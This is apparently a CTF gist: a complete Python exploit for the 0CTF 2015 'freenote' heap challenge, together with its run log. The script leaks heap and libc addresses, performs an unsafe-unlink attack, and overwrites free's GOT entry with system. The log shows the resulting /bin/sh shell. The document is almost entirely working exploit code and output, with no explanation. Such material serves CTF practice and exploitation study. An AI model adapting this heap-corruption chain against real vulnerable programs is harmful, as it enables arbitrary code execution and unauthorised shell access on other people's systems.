0CTF 2015 Quals CTF freenote (exploit 400) / https://github.com/ctfs/write-ups-2015/tree/master/0ctf-2015/exploit/freenote https://kitctf.de/writeups/0ctf2015/freenote/

gistfile1.txt

$ python test.py

[+} leak libc and heap address
base_heap = 14e7000
base_libc = 7f667cdea000
[+] unsafe unlink attack
[+] got overwrite: free -> system
[+] got a shell!
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

$ /lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al.
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 5.3.1 20160413.
Available extensions:
        crypt add-on version 2.1 by Michael Glad and others
        GNU Libidn by Simon Josefsson
        Native POSIX Threads Library by Ulrich Drepper et al
        BIND-8.2.3-T5B
libc ABIs: UNIQUE IFUNC
For bug reporting instructions, please see:
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.

test.py

from minipwn import *

def new_note(s, length, data):
    recvuntil(s, 'Your choice: ')
    sendline(s, str(2))
    recvuntil(s, 'Length of new note: ')
    sendline(s, str(length))
    recvuntil(s, 'Enter your note: ')
    s.sendall(data)

def edit_note(s, note_number, length, data):
    recvuntil(s, 'Your choice: ')
    sendline(s, str(3))
    recvuntil(s, 'Note number: ')
    sendline(s, str(note_number))
    recvuntil(s, 'Length of note: ')
    sendline(s, str(length))
    recvuntil(s, 'Enter your note: ')
    s.sendall(data)

def delete_note(s, note_number):
    recvuntil(s, 'Your choice: ')
    sendline(s, str(4))
    recvuntil(s, 'Note number: ')
    sendline(s, str(note_number))

s = connect_process(['./freenote'])
raw_input()

print '[+} leak libc and heap address'

new_note(s, 0x10, 'A'*0x10)
new_note(s, 0x10, 'B'*0x10)
new_note(s, 0x10, 'C'*0x10)
new_note(s, 0x10, 'D'*0x10)
delete_note(s, 2)
delete_note(s, 0)
new_note(s, 0x8, 'E'*0x8)

recvuntil(s, 'Your choice: ')
sendline(s, str(1))
data = recvline(s)
recvline(s)
recvline(s)

data = data.rstrip()
addr_heap = u64(data[11:].ljust(8, '\x00'))
base_heap = addr_heap - 0x1820
print "base_heap = %x" % base_heap

delete_note(s, 3)
delete_note(s, 0)
new_note(s, 0x8, 'F'*0x8)

recvuntil(s, 'Your choice: ')
sendline(s, str(1))
data = recvline(s)
recvline(s)

data = data.rstrip()
arena_top = u64(data[11:].ljust(8, '\x00'))
base_libc = arena_top - 0x3c3b78
print "base_libc = %x" % base_libc

delete_note(s, 0)
delete_note(s, 1)

print '[+] unsafe unlink attack'

addr_target = base_heap + 0x30

new_note(s, 0x100, 'A'*0x100)
new_note(s, 0x100, 'B'*0x100)
new_note(s, 0x100, 'C'*0x100)
delete_note(s, 0)
delete_note(s, 1)
delete_note(s, 2)

buf = '\x00' * 0x10
buf += p64(addr_target-0x18)
buf += p64(addr_target-0x10)
buf += '\x00' * 0xe0
buf += p64(0x100)
buf += p64(0x110)
buf += '\x00' * 0x100
buf += p64(0)
buf += p64(0x111)

new_note(s, 0x220, buf)
delete_note(s, 1)

print '[+] got overwrite: free -> system'

got_free = 0x602018
addr_libc_system = base_libc + 0x45380

buf = p64(0)
buf += p64(1)
buf += p64(8)
buf += p64(got_free)
buf = buf.ljust(0x220, '\x00')

edit_note(s, 0, 0x220, buf)
edit_note(s, 0, 8, p64(addr_libc_system))

print '[+] got a shell!'

new_note(s, 8, '/bin/sh\x00')
delete_note(s, 1)

interact(s)